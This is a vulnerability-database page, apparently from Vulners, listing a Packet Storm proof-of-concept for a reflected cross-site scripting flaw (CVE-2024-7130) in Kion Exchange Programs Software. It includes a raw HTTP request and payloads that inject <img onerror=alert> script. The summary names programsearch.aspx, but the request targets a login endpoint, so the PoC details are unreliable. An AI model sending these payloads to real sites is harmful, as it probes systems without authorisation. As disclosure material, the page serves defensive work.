Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting

🗓️ 29 May 2025 00:00:00Reported by Kutay ErgenType 
packetstorm
 packetstorm🔗 packetstorm.news👁 97 Views

Reflected cross site scripting in Kion Exchange Programs Software via programsearch.aspx searchtext.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2024-7130
21 Nov 202414:15
attackerkb
CNNVD		KION Exchange Programs Software 跨站脚本漏洞
21 Nov 202400:00
cnnvd
CVE		CVE-2024-7130
21 Nov 202413:44
cve
Cvelist		CVE-2024-7130 Reflected XSS in Kion Computer's KION Exchange Programs Software
21 Nov 202413:44
cvelist
EUVD		EUVD-2024-48831
3 Oct 202520:07
euvd
NVD		CVE-2024-7130
21 Nov 202414:15
nvd
RedhatCVE		CVE-2024-7130
23 May 202506:43
redhatcve
Vulnrichment		CVE-2024-7130 Reflected XSS in Kion Computer's KION Exchange Programs Software
21 Nov 202413:44
vulnrichment
# Exploit Title: Kion Exchange Programs Software Reflected XSS
    # CVE: CVE-2024-7130
    # PoC-Date: 2025-05-28
    # Exploit Author: Kutay ERGEN
    # Vendor Homepage: https://www.kionexchangeprograms.com
    # Version: <= 1.21.9092.29966
    # Tested on: Chrome 124, Firefox 125
    # CVSS Score: 5.5 (Medium)
    # CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
    # Educational Use Only: This PoC is published for academic research and testing purposes only. Unauthorized use is strictly prohibited.
    
    ## Vulnerability Summary:
    The Kion Exchange Programs Software is affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the programsearch.aspx endpoint. The searchtext query parameter fails to sanitize input, allowing attackers to inject arbitrary HTML/JS code.
    
    ## Proof of Concept:
    POST /Account/Login.aspx?pId= HTTP/1.1
    Host: example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
    _CALLBACKID=<img src=x onerror=alert('XSS');>&_CALLBACKPARAM=c0:resetPassword
    
    Payload:
    #<img src=M onerror=alert(1);>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 May 2025 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.15.5
EPSS0.00094
SSVC
cross site scriptingprogramsearch.aspxsearchtextreflectedweb vulnerability
97